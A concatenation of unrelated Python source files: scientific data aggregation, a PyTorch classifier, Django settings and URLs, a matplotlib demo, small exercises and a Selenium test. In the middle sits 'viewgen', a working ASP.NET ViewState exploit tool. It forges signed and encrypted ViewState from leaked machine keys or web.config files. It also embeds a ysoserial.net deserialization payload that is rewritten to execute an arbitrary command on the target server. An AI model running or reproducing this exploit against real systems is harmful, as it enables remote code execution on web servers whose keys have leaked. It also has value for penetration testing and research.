def _hdf2agg(filename, hemi=None, cluster=None, freq=None):
"""Convert HDF file back to aggregate DataFrame.
Args:
filename: Path to aggregate file
hemi: str, default None
Restrict return to these hemi combination strategy.
cluster: str, default None
Restrict return to this cluster
freq: int, default None
Restrict return to this frequency
Returns:
DataFrame indexed by hemi, cluster, trial and freq in the rows
and time in the columns.
"""
import h5py
dfs = []
with h5py.File(filename, mode='r') as store:
for fhemi, hd in store.items():
if hemi is not None and not (str(hemi) == fhemi):
continue
for fcluster, cd in hd.items():
if (cluster is not None) and (
not any([str(c) == fcluster for c in
ensure_iter(cluster)])):
continue
for fF, Fd in cd.items():
if freq is not None and not (str(freq) == fF):
continue
dfs.append(get_df_from_hdf(Fd))
return pd.concat(dfs)
def get_df_from_hdf(dataset):
"""Convert HDF dataset to pandas Dataframe
"""
cols = []
rows = []
row_names = []
col_names = []
for key, values in dataset.attrs.items():
dname = values.dtype.name
if 'bytes' in dname:
values = values.astype('U')
try:
values = [float(i) for i in values]
except ValueError:
pass
if key.startswith('cols_'):
cols.append(values)
col_names.append(key.replace('cols_', ''))
if key.startswith('rows_'):
rows.append(values)
row_names.append(key.replace('rows_', ''))
index = pd.MultiIndex.from_arrays(rows)
index.names = row_names
cols = pd.MultiIndex.from_arrays(cols)
cols.names = col_names
return pd.DataFrame(dataset[:], index=index, columns=cols)
def aggregate(tfr_data, hemis):
"""Aggregate individual areas into clusters.
"""
from itertools import product
from pymeg import atlas_glasser
all_clusters, _, _, _ = atlas_glasser.get_clusters()
clusters = []
tfr_areas = np.unique(tfr_data.index.get_level_values('area'))
for hemi, cluster in product(hemis, all_clusters.keys()):
print('Working on %s, %s' % (hemi, cluster))
tfrs_rh = [area for area in all_clusters[cluster] if 'rh' in area]
tfrs_lh = [area for area in all_clusters[cluster] if 'lh' in area]
tfrs_rh = [t for t in tfr_areas if any(
[a.lower() in t.lower() for a in tfrs_rh])]
tfrs_lh = [t for t in tfr_areas if any(
[a.lower() in t.lower() for a in tfrs_lh])]
lh_idx = tfr_data.index.isin(tfrs_lh, level='area')
rh_idx = tfr_data.index.isin(tfrs_rh, level='area')
left = tfr_data.loc[lh_idx, :].groupby(
['freq', 'trial']).mean()
right = tfr_data.loc[rh_idx, :].groupby(
['freq', 'trial']).mean()
if hemi == 'Pair':
left.loc[:, 'cluster'] = cluster + '_LH'
left.loc[:, 'hemi'] = 'Pair'
right.loc[:, 'cluster'] = cluster + '_RH'
right.loc[:, 'hemi'] = 'Pair'
clusters.append(left)
clusters.append(right)
else:
if hemi == 'Lateralized':
tfrs = left - right
elif hemi == 'Averaged':
tfrs = (right + left) / 2
tfrs.loc[:, 'cluster'] = cluster
tfrs.loc[:, 'hemi'] = hemi
clusters.append(tfrs)
df = pd.concat(clusters)
df.set_index(['cluster', 'hemi'], append=True, inplace=True)
return df.reorder_levels(
['hemi', 'cluster', 'trial', 'freq'])
def ensure_iter(input):
if isinstance(input, str):
yield input
else:
try:
for item in input:
yield item
except TypeError:
yield input
|
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch.nn.functional import cross_entropy
from Dictionary.utils import word_vector_from_seq
from metrics.feature_extraction.definition_classifier \
import DefinitionClassifier
def evaluate_representations(model, corpus, batch_size, bptt_limit, cuda):
"""
Measure the richness of the hidden states by using them as features
for a multi-class regression model.
Assumes that each section is a passage with an omitted-term and a
'target' to predict.
We first train a two-layer neural network to serve as the classifier
before evaluation begins.
"""
classifier_data = []
feature_size = None
target_set = set()
# Collect the data for the classifier (harvest hidden states and pair
# with targets).
model.eval()
print("Evaluation in progress: Representations")
for i, document in enumerate(corpus.test):
for j, section in enumerate(document["sections"]):
hidden = model.init_hidden()
# Training at the word level allows flexibility in inference.
for k in range(section.size(0) - 1):
current_word = word_vector_from_seq(section, k)
if cuda:
current_word = current_word.cuda()
output, hidden = model(Variable(current_word), hidden)
# Flatten the model's final hidden states to be used as features.
features = hidden.view(-1, 1)
if feature_size is None:
feature_size = features.size()[0]
# Each section has a corresponding target.
target = document["targets"][j]
target_set.add(target)
example = {
"features": features.data,
"target": target
}
classifier_data.append(example)
# See how well the hidden states represent semantics:
target_size = len(target_set)
definition_classifier = DefinitionClassifier(feature_size, 128, target_size)
optimizer = torch.optim.Adam(definition_classifier.parameters(), lr=0.005)
epochs = 2
classifier_accuracy = train_classifier(definition_classifier, classifier_data,
epochs, target_set, optimizer, cuda)
print("Classification accuracy from hidden state features: {.5f}"
.format(classifier_accuracy))
def train_classifier(model, data, epochs, target_set, optimizer, cuda):
"""
Train a definition classifier for one epoch.
"""
total_loss = 0
# Establish labels for each target:
target_mappings = {}
target_list = list(target_set)
for i, target in enumerate(target_list):
target_mappings[target] = i
# Helper function for conversion to Variable for learning.
def target_to_variable(target):
target_variable = torch.LongTensor(1)
target_variable[0] = target_mappings[target]
target_variable = Variable(target_variable)
return target_variable
# Set model to training mode (activates dropout and other things).
model.train()
print("Classifier Training in progress:")
for _ in range(epochs):
for i, example in enumerate(data):
features = example["features"]
target = target_to_variable(example["target"])
if cuda:
features = features.cuda()
target = target.cuda()
output = model(Variable(features))
# Calculate loss between the next word and what was anticipated.
loss = cross_entropy(output.view(1, -1), target)
total_loss += loss.data[0]
# Backpropagation.
optimizer.zero_grad()
loss.backward()
optimizer.step()
print("Total loss from training: {.5f}".format(total_loss[0]))
# Calculate final accuracy.
model.eval()
correct = 0
for i, example in enumerate(data):
features = example["features"]
target = target_mappings[example["target"]]
if cuda:
features = features.cuda()
target = target.cuda()
output = model(Variable(features))
_, prediction = torch.max(output, 0)
if prediction == target:
correct += 1
final_acc = correct / len(data)
return final_acc
|
class FundamentalType(object):
def __init__(self, name):
self._name = name
@property
def typename(self):
return self._name
class StructureType(object):
def __init__(self, name, fields):
self._fields = fields
self._name = name
@property
def typename(self):
return self._name
@property
def fields(self):
for i, v in enumerate(self._fields):
yield v, 'f' + str(i)
class ArrayType(object):
def __init__(self, basetype, size):
self.basetype = basetype
self.size = size
@property
def typename(self):
return '%s[%d]' % (self.basetype.typename, self.size)
|
#!/usr/bin/env python3
from pprint import pprint
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from Crypto.Cipher import DES3
from viewstate import ViewState
from xml.dom import minidom
from colored import fg, attr
import argparse
import hashlib
import hmac
import base64
import os
import binascii
import struct
pad = lambda s, bs: s + (bs - len(s) % bs) * chr(bs - len(s) % bs).encode("ascii")
unpad = lambda s: s[:-ord(s[len(s)-1:])]
def success(s):
print("[%s+%s] %s%s%s%s" % (fg("light_green"), attr(0), attr(1), s, attr(21), attr(0)))
def warning(s):
print("[%s!%s] %s%s%s%s" % (fg("yellow"), attr(0), attr(1), s, attr(21), attr(0)))
class ViewGen:
MD5_MODIFIER = b"\x00"*4
MODIFIER_SIZE = 4
hash_algs = {"SHA1": hashlib.sha1, "MD5": hashlib.md5, "SHA256": hashlib.sha256, "SHA384": hashlib.sha384, "SHA512": hashlib.sha512, "AES": hashlib.sha1, "3DES": hashlib.sha1}
hash_sizes = {"SHA1": 20, "MD5": 16, "SHA256": 32, "SHA384": 48, "SHA512": 64, "AES": 20, "3DES": 20}
def __init__(self, validation_key=None, validation_alg=None, dec_key=None, dec_alg=None, modifier=None, encrypted=False):
self.validation_key = validation_key
self.dec_key = dec_key
self._init_validation_alg(validation_alg)
self._init_dec_alg(dec_alg)
self.encrypted = encrypted
if modifier is None:
self.modifier = ViewGen.MD5_MODIFIER
else:
self.modifier = struct.pack("<I", int(modifier, 16))
self._reuse_iv = False
self._iv = None
self._random_bytes = None
def encode(self, payload, reuse_iv=False):
self._reuse_iv = reuse_iv
if self.encrypted:
return self.encrypt_and_sign(payload)
return self.sign(payload)
def decode(self, payload, parse=False):
if self.encrypted:
payload, signature = self.decrypt(payload)
try:
vs = ViewState(payload)
except:
print(f"[!] Invalid formatting. Decrypted ViewState printed below in Base64:\n{payload}")
return None, None
else:
vs = ViewState(payload)
try:
vs.decode()
signature = vs.signature
if self.validation_alg is None:
self.validation_alg = vs.mac
payload = base64.b64encode(base64.b64decode(payload)[:-self._get_hash_size()])
except:
return None, None
if parse:
return vs.decode(), signature
return payload, signature
def encrypt(self, data):
iv = self._iv
random_bytes = self._random_bytes
if self.dec_alg == "AES":
if not self._reuse_iv:
iv = self._gen_random_bytes(AES.block_size)
random_bytes = self._gen_random_bytes(AES.block_size)
cipher = AES.new(self.dec_key, AES.MODE_CBC, iv)
payload = pad(random_bytes + data + self.modifier, AES.block_size)
elif self.dec_alg == "DES":
if not self._reuse_iv:
iv = self._gen_random_bytes(DES.block_size)
cipher = DES.new(self.dec_key[:8], DES.MODE_CBC, iv)
payload = pad(data + self.modifier, DES.block_size)
elif self.dec_alg == "3DES":
if not self._reuse_iv:
iv = self._gen_random_bytes(DES3.block_size)
cipher = DES3.new(self.dec_key[:24], DES3.MODE_CBC, iv)
payload = pad(data + self.modifier, DES3.block_size)
else:
return None
return cipher.encrypt(payload), iv
def decrypt(self, payload):
data = base64.b64decode(payload)
hash_size = self._get_hash_size()
if self.dec_alg == "AES":
iv = data[0:AES.block_size]
enc = data[AES.block_size:-hash_size]
cipher = AES.new(self.dec_key, AES.MODE_CBC, iv)
block_size = AES.block_size
random_bytes_size = block_size
elif self.dec_alg == "DES":
iv = data[0:DES.block_size]
enc = data[DES.block_size:-hash_size]
cipher = DES.new(self.dec_key[:8], DES.MODE_CBC, iv)
random_bytes_size = 0
elif self.dec_alg == "3DES":
iv = data[0:DES3.block_size]
enc = data[DES3.block_size:-hash_size]
cipher = DES3.new(self.dec_key[:24], DES3.MODE_CBC, iv)
random_bytes_size = 0
else:
return None
dec = cipher.decrypt(enc)
signature = data[-hash_size:]
unpad_dec = unpad(dec)
self._random_bytes = unpad_dec[:random_bytes_size]
self._iv = iv
modifier = unpad_dec[-ViewGen.MODIFIER_SIZE:]
idx = ViewGen.MODIFIER_SIZE
if self._double_signature:
idx += 20
return base64.b64encode(unpad_dec[random_bytes_size:-idx]), signature
def encrypt_and_sign(self, payload):
if self._double_signature:
payload = self.sign(payload)
data = base64.b64decode(payload)
enc, iv = self.encrypt(data)
if "MD5" in self.validation_alg:
h = hashlib.md5(iv + enc + self.validation_key)
else:
hash_alg = self._get_hash_alg()
if hash_alg:
h = hmac.new(self.validation_key, iv + enc, hash_alg)
else:
return None
return base64.b64encode(iv + enc + h.digest())
def sign(self, payload):
data = base64.b64decode(payload)
if "MD5" in self.validation_alg:
h = hashlib.md5(data + self.validation_key + ViewGen.MD5_MODIFIER)
else:
hash_alg = self._get_hash_alg()
if hash_alg:
h = hmac.new(self.validation_key, data + self.modifier, hash_alg)
else:
return base64.b64encode(data)
return base64.b64encode(data + h.digest())
@staticmethod
def guess_algorithms(payload):
payload_size = len(base64.b64decode(payload))
candidates = []
for hash_alg in ViewGen.hash_sizes.keys():
hash_size = ViewGen.hash_sizes[hash_alg]
if (payload_size - hash_size) % AES.block_size == 0:
candidates.append(("AES", hash_alg))
if (payload_size - hash_size) % DES.block_size == 0:
candidates.append(("DES/3DES", hash_alg))
return candidates
@staticmethod
def _gen_random_bytes(n):
return os.urandom(n)
def _init_dec_alg(self, dec_alg):
self.dec_alg = dec_alg.upper()
if "AUTO" in self.dec_alg:
if len(self.dec_key) == 8:
self.dec_alg = "DES"
else:
self.dec_alg = "AES"
if self.dec_alg == "3DES":
if len(self.dec_key) == 8:
self.dec_alg = "DES"
def _init_validation_alg(self, validation_alg):
self.validation_alg = validation_alg.upper()
self._double_signature = False
if "AES" in self.validation_alg or "3DES" in self.validation_alg:
self._double_signature = True
def _get_hash_size(self):
return self._search_dict(ViewGen.hash_sizes, self.validation_alg)
def _get_hash_alg(self):
return self._search_dict(ViewGen.hash_algs, self.validation_alg)
@staticmethod
def _search_dict(d, query):
items = [value for key, value in d.items() if query in key.upper()]
if not items:
return None
return items[0]
def generate_shell_payload(command):
# Generated with: https://github.com/pwntester/ysoserial.net
ysoserial_net_shell_payload = "/wEy7REAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAADy9jIHBpbmcgOC44LjguOAYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL"
return base64.b64encode(base64.b64decode(ysoserial_net_shell_payload).replace(b"\x0f/c ping 8.8.8.8", bytes("%s%s%s" % (chr(len(command)+3), "/c ", command), "utf-8")))
def read_webconfig(webconfig_path):
document = minidom.parse(webconfig_path)
machine_key = document.getElementsByTagName("machineKey")[0]
vkey = machine_key.getAttribute("validationKey")
valg = machine_key.getAttribute("validation").upper()
dkey = machine_key.getAttribute("decryptionKey")
dalg = machine_key.getAttribute("decryption").upper()
encrypted = False
for subelement in document.getElementsByTagName("pages"):
if subelement.getAttribute("viewStateEncryptionMode") == "Always":
encrypted = True
if valg == "AES" or valg == "3DES":
encrypted = True
return vkey, valg, dkey, dalg, encrypted
def parse_args():
parser = argparse.ArgumentParser(description="viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files")
parser.add_argument("--webconfig", help="automatically load keys and algorithms from a web.config file", required=False)
parser.add_argument("-m", "--modifier", help="VIEWSTATEGENERATOR value", required=False, default="00000000")
parser.add_argument("-c", "--command", help="command to execute", required=False)
parser.add_argument("--decode", help="decode a ViewState payload", required=False, default=False, action="store_true")
parser.add_argument("--decrypt", help="print decrypted ViewState payload (don't try to decode)", required=False, default=False, action="store_true")
parser.add_argument("--guess", help="guess signature and encryption mode for a given payload", required=False, default=False, action="store_true")
parser.add_argument("--check", help="check if modifier and keys are correct for a given payload", required=False, default=False, action="store_true")
parser.add_argument("--vkey", help="validation key", required=False, default="")
parser.add_argument("--valg", help="validation algorithm", required=False, default="")
parser.add_argument("--dkey", help="decryption key", required=False, default="")
parser.add_argument("--dalg", help="decryption algorithm", required=False, default="")
parser.add_argument("-e", "--encrypted", help="ViewState is encrypted", required=False, default=False, action="store_true")
parser.add_argument("payload", help="ViewState payload (base 64 encoded)", nargs="?")
args = parser.parse_args()
if args.webconfig:
args.vkey, args.valg, args.dkey, args.dalg, args.encrypted = read_webconfig(args.webconfig)
return args
def run_viewgen(args):
if args.payload is None and args.command is None:
warning("The following arguments are required: payload")
exit(1)
generate = not args.decode and not args.check and not args.guess
if generate or args.check:
if not args.vkey or not args.valg or not args.dkey or not args.dalg:
warning("Please provide validation/decryption keys and algorithms or a valid web.config")
exit(1)
viewgen = ViewGen(binascii.unhexlify(args.vkey), args.valg, binascii.unhexlify(args.dkey), args.dalg, args.modifier, args.encrypted)
# New option from @ramen0x3f
if args.decrypt:
viewstate = viewgen.decrypt(args.payload)[0].decode('ascii')
if viewstate is not None:
print(f"Decrypted ViewState (decode with Base64): {viewstate}")
if args.decode:
viewstate, signature = viewgen.decode(args.payload, parse=True)
success("ViewState")
pprint(viewstate)
if signature is not None:
success("Signature: %s" % str(binascii.hexlify(signature), "utf-8"))
if args.check:
viewstate, sa = viewgen.decode(args.payload)
encoded = viewgen.encode(viewstate, reuse_iv=True)
viewstate, sb = viewgen.decode(encoded)
if sa == sb:
success("Signature match")
else:
warning("Signature fail")
if args.guess:
viewstate, signature = viewgen.decode(args.payload)
if viewstate is None:
warning("ViewState is encrypted")
candidates = viewgen.guess_algorithms(args.payload)
success("Algorithm candidates:")
for candidate in candidates:
print("%s %s" % (candidate[0], candidate[1].upper()))
else:
if viewgen.encrypted:
success("ViewState has been decrypted")
else:
success("ViewState is not encrypted")
if signature is None:
success("ViewState is not signed")
else:
hash_alg = list(viewgen.hash_sizes.keys())[list(viewgen.hash_sizes.values()).index(len(signature))]
success("Signature algorithm: %s" % hash_alg.upper())
if generate:
if args.command is None:
result = viewgen.encode(args.payload)
else:
result = viewgen.encode(generate_shell_payload(args.command))
print(str(result, "utf-8"))
if __name__ == "__main__":
args = parse_args()
run_viewgen(args)
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
from .data import langs
class Language(object):
def __init__(self, iso):
self.iso = iso
try:
self.name = langs[iso]
except KeyError:
raise KeyError("Language with iso code '%s' unknown" % iso)
def __repr__(self):
return u"Language(iso={})".format(self.iso)
def __str__(self):
return self.name
def __eq__(self, other):
return self.iso == other.iso and self.name == other.name
|
from django.conf import settings
import humanfriendly
# humanfriendly value
# see: https://humanfriendly.readthedocs.io/en/latest/readme.html#a-note-about-size-units # noqa
MINIO_STORAGE_MAX_FILE_SIZE = getattr(
settings, 'MINIO_STORAGE_MAX_FILE_SIZE', "100M")
MAX_FILE_SIZE = humanfriendly.parse_size(MINIO_STORAGE_MAX_FILE_SIZE)
assert MAX_FILE_SIZE > 0, "File size is small"
# Необходимо промигрировать базу при изменении этого значения
MINIO_STORAGE_MAX_FILE_NAME_LEN = getattr(
settings, 'MINIO_STORAGE_MAX_FILE_NAME_LEN', 100)
assert MINIO_STORAGE_MAX_FILE_NAME_LEN > 0, "File name is small"
# Максимальное колмчество файлов в одном объекте
# Например 5 вложений в одном тикете
# None - неограничено
MINIO_STORAGE_MAX_FILES_COUNT = getattr(
settings, 'MINIO_STORAGE_MAX_FILES_COUNT', None)
MINIO_STORAGE_USE_HTTPS = getattr(
settings, 'MINIO_STORAGE_USE_HTTPS', False)
# Проверяем, что пользователь добавил все необходимые настройки
MINIO_STORAGE_ENDPOINT = settings.MINIO_STORAGE_ENDPOINT
MINIO_STORAGE_ACCESS_KEY = settings.MINIO_STORAGE_ACCESS_KEY
MINIO_STORAGE_SECRET_KEY = settings.MINIO_STORAGE_SECRET_KEY
MINIO_STORAGE_BUCKET_NAME = settings.MINIO_STORAGE_BUCKET_NAME
MINIO_STORAGE_CLEAN_PERIOD = getattr(
settings, 'MINIO_STORAGE_CLEAN_PERIOD', 30)
TAGS_COUNT_MAX = 10
TAGS_CHARACTER_LIMIT = 100
|
from tkinter import PhotoImage
import random
from ImageDeck import ImageDeck
class TestingGroundsImages(object):
"""description of class"""
def __init__(self):
self.Blank = PhotoImage(width=70,height=100)
self.MainMenu = PhotoImage(file='Images\\main menu_testing grounds.gif')
self.backs = []
self.backs.append(PhotoImage(file='Images\\back_adorably hideous.gif'))
self.decks = []
self.oxygen = ImageDeck('Images\\oxygen\\')
self.decks.append(self.oxygen)
self.backs.append(self.oxygen.Back)
self.oxygenWhite = ImageDeck('Images\\oxygen white\\')
self.oxygenWhite.Joker = PhotoImage(file='Images\\oxygen white\\joker.gif')
self.decks.append(self.oxygenWhite)
self.backs.append(self.oxygenWhite.Back)
def GetRandomBack(self)->PhotoImage:
return random.choice(self.backs)
def GetRandomDeck(self)->ImageDeck:
return random.choice(self.decks) |
print('I will check if a string is a palindrome.')
text = input('Enter some text: ').strip().lower()
def reverseText(string):
return string[::-1]
if reverseText(text) == text:
print('It is a palindrome.')
else:
print('It is not a palindrome.')
|
from django.apps import AppConfig
class PhotoBlogConfig(AppConfig):
name = 'photo_blog'
def ready(self):
import photo_blog.signals |
"""
============
axhspan Demo
============
Create lines or rectangles that span the axes in either the horizontal or
vertical direction.
"""
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(-1, 2, .01)
s = np.sin(2 * np.pi * t)
plt.plot(t, s)
# Draw a thick red hline at y=0 that spans the xrange
plt.axhline(linewidth=8, color='#d62728')
# Draw a default hline at y=1 that spans the xrange
plt.axhline(y=1)
# Draw a default vline at x=1 that spans the yrange
plt.axvline(x=1)
# Draw a thick blue vline at x=0 that spans the upper quadrant of the yrange
plt.axvline(x=0, ymin=0.75, linewidth=8, color='#1f77b4')
# Draw a default hline at y=.5 that spans the middle half of the axes
plt.axhline(y=.5, xmin=0.25, xmax=0.75)
plt.axhspan(0.25, 0.75, facecolor='0.5', alpha=0.5)
plt.axvspan(1.25, 1.55, facecolor='#2ca02c', alpha=0.5)
plt.show()
|
import importlib
import os
import sys
from logging import getLogger
from typing import List
from omnium.omnium_errors import OmniumError
from omnium.pkg_state import PkgState
from omnium.version import get_version
from omnium.suite import Suite
from omnium.utils import check_git_commits_equal, cd
from .analyser import Analyser
logger = getLogger('om.analysis_pkg')
class AnalysisPkg(dict):
"""Wrapper around an analysis package.
An analysis package is a python package that has certain variables.
It must have in its top level:
__version__: Tuple[int]
analyser_classes: List[Analyser]
analysis_settings_filename: str - where settings.json will get written to
analysis_settings = Dict[str, AnalysisSettings]
"""
def __init__(self, name: str, pkg, suite: Suite):
self.name = name
self.pkg = pkg
self.suite = suite
self.state = PkgState(self.pkg)
self.version = self.pkg.__version__
self.pkg_dir = os.path.dirname(self.pkg.__file__)
for cls in pkg.analyser_classes:
if cls not in self:
self[cls.analysis_name] = cls
else:
logger.warning('Multiple analysis classes named: {}', cls)
self.analysis_settings = self.pkg.analysis_settings
self.analysis_settings_filename = self.pkg.analysis_settings_filename
analysis_pkg_config = self.suite.app_config['analysis_{}'.format(self.name)]
commit = analysis_pkg_config['commit']
with cd(self.pkg_dir):
if not check_git_commits_equal('HEAD', commit):
msg = 'analysis_pkg {} not at correct version'.format(self.name)
logger.error(msg)
logger.error('try running `omnium analysis-setup` to fix')
raise OmniumError(msg)
class AnalysisPkgs(dict):
"""Contains all analysis packages"""
def __init__(self, analysis_pkg_names: List[str], suite: Suite):
self._analysis_pkg_names = analysis_pkg_names
self.suite = suite
self._cls_to_pkg = {}
self.analyser_classes = {}
self.have_found = False
if self.suite.is_in_suite:
self._load()
def _load(self):
if self.have_found:
raise OmniumError('Should only call load once')
analysis_pkgs_dir = os.path.join(self.suite.suite_dir, '.omnium/analysis_pkgs')
if not os.path.exists(analysis_pkgs_dir):
logger.warning('analysis_pkg_dir: {} does not exist', analysis_pkgs_dir)
return
for analysis_pkg_dir in os.listdir(analysis_pkgs_dir):
sys.path.append(os.path.join(analysis_pkgs_dir, analysis_pkg_dir))
if self._analysis_pkg_names:
# First dir takes precedence over second etc.
for analyser_pkg_name in self._analysis_pkg_names:
try:
pkg = importlib.import_module(analyser_pkg_name)
except ImportError as e:
logger.error("Package '{}' not found on PYTHONPATH", analyser_pkg_name)
logger.error("Or could not load it")
logger.error(e)
continue
analysis_pkg = AnalysisPkg(analyser_pkg_name, pkg, self.suite)
for cls_name, cls in analysis_pkg.items():
self._cls_to_pkg[cls] = analysis_pkg
self.analyser_classes[cls_name] = cls
self[analyser_pkg_name] = analysis_pkg
self.have_found = True
def get_settings(self, analyser_cls, settings_name):
analysis_pkg = self._cls_to_pkg[analyser_cls]
logger.debug('analysis_cls {} in package {}', analyser_cls, analysis_pkg.name)
settings_dict = analysis_pkg.analysis_settings
if settings_name not in settings_dict:
raise OmniumError('Settings {} not defined in {}, choices are {}'
.format(settings_name, analysis_pkg, settings_dict.keys()))
return analysis_pkg.analysis_settings_filename, settings_dict[settings_name]
def get_package(self, analyser_cls: Analyser) -> AnalysisPkg:
return self._cls_to_pkg[analyser_cls]
def get_package_version(self, analyser_cls):
analysis_pkg = self._cls_to_pkg[analyser_cls]
return AnalysisPkgs._get_package_version(analysis_pkg)
@staticmethod
def _get_package_version(package):
return package.pkg.__name__ + '_v' + get_version(package.pkg.__version__, form='medium')
|
# import numpy as np
def weighted_mean(x, w):
# Zip() returns a list of tuples, where an i-th tuple contains the i-th element of each of the arguments.
return round(sum(val * weight for val, weight in zip(x, w)) / sum(w), 1)
# or
# return round(np.average([x], weights=[w]), 1)
def main():
int(input())
vals = list(map(int, input().split()))
weights = list(map(int, input().split()))
print(weighted_mean(vals, weights))
if __name__ == "__main__":
main()
|
__name__ = 'tcvaemolgen'
from .tcvaemolgen import bridge, \
interfaces, \
models, \
patterns, \
preprocessing, \
reporting, \
structurs, \
train, \
utils, \
visualization |
from django.urls import path
from . import views
app_name = 'blog'
urlpatterns = [
path('<int:year>/<int:month>/<int:day>/<slug:slug>/',
views.post_detail,
name='post_detail'),
path('tag/<slug:slug>/',
views.tag_detail,
name='tag_detail'),
path('', views.post_index, name='post_index'),
] |
import numpy as np
import parser
def parse(code, **kwargs):
"""
Fake parsing code with arguments
"""
return ast.parse(code, **kwargs) |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import keyboard
from time import sleep
import unittest
class TestPageLoad(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
def testPageTitle(self):
self.browser.get('https://code.gov')
